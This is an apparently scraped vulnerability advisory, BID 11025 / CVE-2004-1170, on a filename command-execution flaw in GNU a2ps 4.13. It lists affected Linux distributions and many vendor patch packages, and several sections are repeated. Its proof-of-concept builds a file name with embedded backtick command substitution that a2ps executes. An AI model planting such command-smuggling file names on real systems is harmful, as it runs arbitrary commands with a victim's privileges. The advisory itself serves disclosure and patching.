GNU a2ps File Name Command Execution Vulnerability
BID:11025
Info
GNU a2ps File Name Command Execution Vulnerability
| Bugtraq ID: | 11025 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-1170 |
| Remote: | No |
| Local: | Yes |
| Published: | Aug 24 2004 12:00AM |
| Updated: | May 08 2006 09:09PM |
| Credit: | Discovery of this issue is credited to Rudolf Polzer <[email protected]>. |
| Vulnerable: |
SuSE SUSE Linux Enterprise Server 8 SuSE Linux Enterprise Server 9 SuSE Linux 8.1 Sun Java Desktop System (JDS) 2.0 Sun Java Desktop System (JDS) 2003 S.u.S.E. Linux Personal 9.1 S.u.S.E. Linux Personal 9.0 x86_64 S.u.S.E. Linux Personal 9.0 S.u.S.E. Linux Personal 8.2 Redhat Linux 9.0 i386 Redhat Linux 7.3 i686 Redhat Linux 7.3 i386 Redhat Linux 7.3 Redhat Fedora Core1 GNU a2ps 4.13 b GNU a2ps 4.13 Gentoo Linux |
| Not Vulnerable: | |
Discussion
GNU a2ps File Name Command Execution Vulnerability
Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.
An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.
Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well.
Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.
An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.
Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well.
Exploit / POC
GNU a2ps File Name Command Execution Vulnerability
No exploit it required to leverage this issue. The following proof of concept has been provided:
The issue can be illustrated with the following set of shell commands:
$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'
No exploit it required to leverage this issue. The following proof of concept has been provided:
The issue can be illustrated with the following set of shell commands:
$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'
Solution / Fix
GNU a2ps File Name Command Execution Vulnerability
Solution:
Please see the referenced advisories for more information.
GNU a2ps 4.13 b
GNU a2ps 4.13
Solution:
Please see the referenced advisories for more information.
GNU a2ps 4.13 b
-
Debian a2ps_4.13b-16woody1_alpha.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_alpha.deb -
Debian a2ps_4.13b-16woody1_arm.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_arm.deb -
Debian a2ps_4.13b-16woody1_hppa.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_hppa.deb -
Debian a2ps_4.13b-16woody1_i386.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_i386.deb -
Debian a2ps_4.13b-16woody1_ia64.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_ia64.deb -
Debian a2ps_4.13b-16woody1_m68k.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_m68k.deb -
Debian a2ps_4.13b-16woody1_mips.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_mips.deb -
Debian a2ps_4.13b-16woody1_mipsel.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_mipsel.deb -
Debian a2ps_4.13b-16woody1_powerpc.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_powerpc.deb -
Debian a2ps_4.13b-16woody1_s390.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_s390.deb -
Debian a2ps_4.13b-16woody1_sparc.deb
Debian GNU/Linux 3.0 alias woody
http://security.debian.org/pool/updates/main/a/a2ps/a2ps_4.13b-16woody 1_sparc.deb -
Fedora Legacy a2ps-4.13b-19.2.legacy.i386.rpm
Red Hat Linux 7.3:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/a2ps-4.13b-19 .2.legacy.i386.rpm -
Fedora Legacy a2ps-4.13b-28.2.legacy.i386.rpm
Red Hat Linux 7.3:
http://download.fedoralegacy.org/redhat/9/updates/i386/a2ps-4.13b-28.2 .legacy.i386.rpm -
Fedora Legacy a2ps-4.13b-28.2.legacy.i386.rpm
Red Hat Linux 9:
http://download.fedoralegacy.org/redhat/9/updates/i386/a2ps-4.13b-28.2 .legacy.i386.rpm -
Fedora Legacy a2ps-4.13b-30.2.legacy.i386.rpm
Fedora Core 1:
http://download.fedoralegacy.org/fedora/1/updates/i386/a2ps-4.13b-30.2 .legacy.i386.rpm -
Mandrake a2ps-4.13b-5.1.100mdk.amd64.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-4.13b-5.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-4.13b-5.1.101mdk.i586.rpm
Mandrake Linux 10.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-4.13b-5.1.101mdk.x86_64.rpm
Mandrake Linux 10.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-4.13b-5.1.92mdk.amd64.rpm
Mandrake Linux 9.2/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-devel-4.13b-5.1.100mdk.amd64.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-devel-4.13b-5.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-devel-4.13b-5.1.101mdk.i586.rpm
Mandrake Linux 10.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-devel-4.13b-5.1.101mdk.x86_64.rpm
Mandrake Linux 10.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13b-5.1.100mdk.amd64.rpm
Mandrake Linux 10.0/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13b-5.1.100mdk.i586.rpm
Mandrake Linux 10.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13b-5.1.101mdk.i586.rpm
Mandrake Linux 10.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13b-5.1.101mdk.x86_64.rpm
Mandrake Linux 10.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13b-5.1.92mdk.amd64.rpm
Mandrake Linux 9.2/AMD64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13b-5.1.92mdk.i586.rpm
Mandrake Linux 9.2
http://www.mandrakesecure.net/en/ftp.php -
OpenPKG a2ps-4.13b-2.1.1.src.rpm
ftp://ftp.openpkg.org/release/2.1/UPD/a2ps-4.13b-2.1.1.src.rpm -
OpenPKG a2ps-4.13b-2.2.1.src.rpm
ftp://ftp.openpkg.org/release/2.2/UPD/a2ps-4.13b-2.2.1.src.rpm
GNU a2ps 4.13
-
FreeBSD a2ps shell command execution patch
http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/ports/print/a2ps-lett er/files/patch-select.c?rev=1.1&content-type=text/plain -
Mandrake a2ps-4.13-14.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-4.13-14.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-devel-4.13-14.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-devel-4.13-14.1.C21mdk.x86_64.rpm
Mandrake Corporate Server 2.1/x86_64
http://www.mandrakesecure.net/en/ftp.php -
Mandrake a2ps-static-devel-4.13-14.1.C21mdk.i586.rpm
Mandrake Corporate Server 2.1
http://www.mandrakesecure.net/en/ftp.php -
TurboLinux a2ps-4.13-9.i586.rpm
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Desktop/10/u pdates/RPMS/a2ps-4.13-9.i586.rpm -
TurboLinux a2ps-4.13-9.i586.rpm
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/10/up dates/RPMS/a2ps-4.13-9.i586.rpm -
TurboLinux a2ps-4.13-9.i586.rpm
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/7/upd ates/RPMS/a2ps-4.13-9.i586.rpm -
TurboLinux a2ps-4.13-9.i586.rpm
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Server/8/upd ates/RPMS/a2ps-4.13-9.i586.rpm -
TurboLinux a2ps-4.13-9.i586.rpm
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Workstation/ 7/updates/RPMS/a2ps-4.13-9.i586.rpm -
TurboLinux a2ps-4.13-9.i586.rpm
ftp://ftp.turbolinux.co.jp/pub/TurboLinux/TurboLinux/ia32/Workstation/ 8/updates/RPMS/a2ps-4.13-9.i586.rpm
References
GNU a2ps File Name Command Execution Vulnerability
References:
References:
- a2ps Home Page (GNU)
- Sun Alert ID: 57649 (Sun)